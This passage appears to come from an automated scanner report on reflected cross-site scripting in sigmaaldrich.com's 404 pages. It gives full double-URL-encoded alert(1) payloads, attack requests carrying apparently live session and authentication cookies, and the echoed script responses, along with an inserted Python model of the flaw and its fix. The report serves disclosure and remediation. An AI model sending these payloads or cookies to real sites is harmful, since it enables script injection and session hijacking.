Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:35 GMT
Content-Length: 28988
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support20793";alert(1)//82ed8dc50c0/customer-service/services/facility-operations","E404") ;
   </script>
...[SNIP]...
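The findings in this report (1.174 above and the identical ones that follow for the other path segments) all describe the same chain: the web server decodes the path once, the application's character filter runs on that once-decoded value, the application then decodes a second time, and the result is concatenated into a double-quoted JavaScript string inside cmCreateErrorTag(). The following Python is an added example, not code from the report or from the sigmaaldrich.com application (whose server-side code is not on the page). It models that chain with hypothetical function names, reuses the report's own double-encoded marker as constructed input, shows why a single-encoded attempt is blocked while the double-encoded one breaks out of the string literal, and places a hardened version beside it that drops the second decode and escapes the value for a JavaScript string context before it is written.

```python
"""Added example: decode/filter/embed pipeline behind the cmCreateErrorTag XSS findings.
Everything here is hypothetical modelling of the report's description, not the
application's real code."""
import re
from urllib.parse import unquote

HOST = "www.sigmaaldrich.com:4402"  # host string shown in the report's echoed URL

# Constructed sample paths. The double-encoded marker is the one from finding 1.174;
# the single-encoded variant is built here to show what the filter does catch.
DOUBLE_ENCODED_PATH = (
    "/content/sigma-aldrich/customer-support"
    "20793%2522%253balert%25281%2529%252f%252f82ed8dc50c0/customer-service"
)
SINGLE_ENCODED_PATH = (
    "/content/sigma-aldrich/customer-support"
    "20793%22%3balert%281%29%2f%2f82ed8dc50c0/customer-service"
)

# Hypothetical blacklist of "characters often used in XSS attacks" (report wording).
BLOCKED = set('<>"\'')


def web_server_decode(raw_path: str) -> str:
    """The web server (IBM HTTP Server / Apache) decodes percent-escapes once."""
    return unquote(raw_path)


def app_filter(path: str) -> bool:
    """Blacklist check. In the vulnerable flow it runs BEFORE the app's own decode."""
    return not (set(path) & BLOCKED)


def app_second_decode(path: str) -> str:
    """The unnecessary second URL-decode called out in the remediation detail."""
    return unquote(path)


def render_error_tag_unsafe(host: str, path: str) -> str:
    """Vulnerable sink: the requested URL is concatenated straight into a JS string."""
    return 'cmCreateErrorTag("Error 404 | http://%s%s","E404") ;' % (host, path)


def js_string_escape(value: str) -> str:
    """Escape for a double-quoted JS string literal. Everything outside ASCII
    alphanumerics and a small safe set becomes \\xHH or \\uHHHH, so quotes,
    backslashes and '</script>' cannot terminate the literal or the element."""
    out = []
    for ch in value:
        cp = ord(ch)
        if (ch.isalnum() and cp < 128) or ch in " ,.-_:":
            out.append(ch)
        elif cp < 256:
            out.append("\\x%02x" % cp)
        else:
            out.append("\\u%04x" % cp)
    return "".join(out)


def render_error_tag_safe(host: str, path: str) -> str:
    """Hardened sink: every dynamic value is escaped for the JS string context."""
    return 'cmCreateErrorTag("Error 404 | http://%s%s","E404") ;' % (
        js_string_escape(host), js_string_escape(path))


def vulnerable_pipeline(raw_path: str) -> str:
    """Server decode -> filter -> second decode -> raw concatenation (as reported)."""
    once = web_server_decode(raw_path)
    if not app_filter(once):
        return "blocked"
    twice = app_second_decode(once)          # %22 -> " only now, after the filter
    return render_error_tag_unsafe(HOST, twice)


def hardened_pipeline(raw_path: str) -> str:
    """Server decode -> validate the canonical value -> context-aware escaping.
    No second decode; output escaping is the real control, the filter is defence in depth."""
    once = web_server_decode(raw_path)
    if not app_filter(once):
        return "blocked"
    return render_error_tag_safe(HOST, once)


# Detection check: does the report's marker leave the string literal unescaped?
BREAKOUT = re.compile(r'(?<!\\)";\s*alert\(1\)//')


def string_breakout(script_line: str) -> bool:
    return BREAKOUT.search(script_line) is not None


if __name__ == "__main__":
    print("single-encoded, vulnerable:", vulnerable_pipeline(SINGLE_ENCODED_PATH))
    print("double-encoded, vulnerable:", vulnerable_pipeline(DOUBLE_ENCODED_PATH))
    print("double-encoded, hardened:  ", hardened_pipeline(DOUBLE_ENCODED_PATH))
```

The vulnerable run reproduces the echoed line shown in the response above (`...customer-support20793";alert(1)//82ed8dc50c0...`), while the single-encoded request is rejected by the filter, which is exactly the behaviour the "double URL-encoding" note describes. In the hardened version the filter sees the same canonical value the sink will use, and the escaping makes the filter unnecessary for correctness: feeding the already-decoded marker straight into `render_error_tag_safe` still yields a string that cannot close the literal.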

1.175. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/facility-operations [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/facility-operations

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4c3f%2522%253balert%25281%2529%252f%252fb627421d8b9 was submitted in the REST URL parameter 4. This input was echoed as b4c3f";alert(1)//b627421d8b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Here the requested URL is written verbatim into the string argument of the cmCreateErrorTag() call on the 404 page, so at a minimum that value must be escaped for a JavaScript string literal (encoding quotes, backslashes, slashes and other non-alphanumeric characters as \xHH or \uHHHH sequences) before it is emitted into the script. There should be no need to URL-decode the value of REST URL parameter 4 a second time, as the web server has already decoded the path once; that second decode is what lets the double-encoded payload pass the character filter. In any case, the application should perform its input validation only after all decoding and custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-serviceb4c3f%2522%253balert%25281%2529%252f%252fb627421d8b9/services/facility-operations HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:37 GMT
Content-Length: 28988
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-serviceb4c3f";alert(1)//b627421d8b9/services/facility-operations","E404") ;
   </script>
...[SNIP]...

1.176. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/facility-operations [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/facility-operations

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1da7d%2522%253balert%25281%2529%252f%252f8627ae95de3 was submitted in the REST URL parameter 5. This input was echoed as 1da7d";alert(1)//8627ae95de3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Here the requested URL is written verbatim into the string argument of the cmCreateErrorTag() call on the 404 page, so at a minimum that value must be escaped for a JavaScript string literal (encoding quotes, backslashes, slashes and other non-alphanumeric characters as \xHH or \uHHHH sequences) before it is emitted into the script. There should be no need to URL-decode the value of REST URL parameter 5 a second time, as the web server has already decoded the path once; that second decode is what lets the double-encoded payload pass the character filter. In any case, the application should perform its input validation only after all decoding and custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services1da7d%2522%253balert%25281%2529%252f%252f8627ae95de3/facility-operations HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:39 GMT
Content-Length: 28988
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services1da7d";alert(1)//8627ae95de3/facility-operations","E404") ;
   </script>
...[SNIP]...

1.177. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/facility-operations [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/facility-operations

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35457%2522%253balert%25281%2529%252f%252ff3cf851a95a was submitted in the REST URL parameter 6. This input was echoed as 35457";alert(1)//f3cf851a95a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Here the requested URL is written verbatim into the string argument of the cmCreateErrorTag() call on the 404 page, so at a minimum that value must be escaped for a JavaScript string literal (encoding quotes, backslashes, slashes and other non-alphanumeric characters as \xHH or \uHHHH sequences) before it is emitted into the script. There should be no need to URL-decode the value of REST URL parameter 6 a second time, as the web server has already decoded the path once; that second decode is what lets the double-encoded payload pass the character filter. In any case, the application should perform its input validation only after all decoding and custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services/facility-operations35457%2522%253balert%25281%2529%252f%252ff3cf851a95a HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:41 GMT
Content-Length: 28988
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services/facility-operations35457";alert(1)//f3cf851a95a","E404") ;
   </script>
...[SNIP]...

1.178. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d98b%2522%253balert%25281%2529%252f%252ff50fafc3009 was submitted in the REST URL parameter 1. This input was echoed as 8d98b";alert(1)//f50fafc3009 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and makes XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Here the requested URL is written verbatim into the string argument of the cmCreateErrorTag() call on the 404 page, so at a minimum that value must be escaped for a JavaScript string literal (encoding quotes, backslashes, slashes and other non-alphanumeric characters as \xHH or \uHHHH sequences) before it is emitted into the script. There should be no need to URL-decode the value of REST URL parameter 1 a second time, as the web server has already decoded the path once; that second decode is what lets the double-encoded payload pass the character filter. In any case, the application should perform its input validation only after all decoding and custom canonicalisation has been carried out.

Request

GET /content8d98b%2522%253balert%25281%2529%252f%252ff50fafc3009/sigma-aldrich/customer-support/customer-service/services/facility-operations/chemical-handling HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; 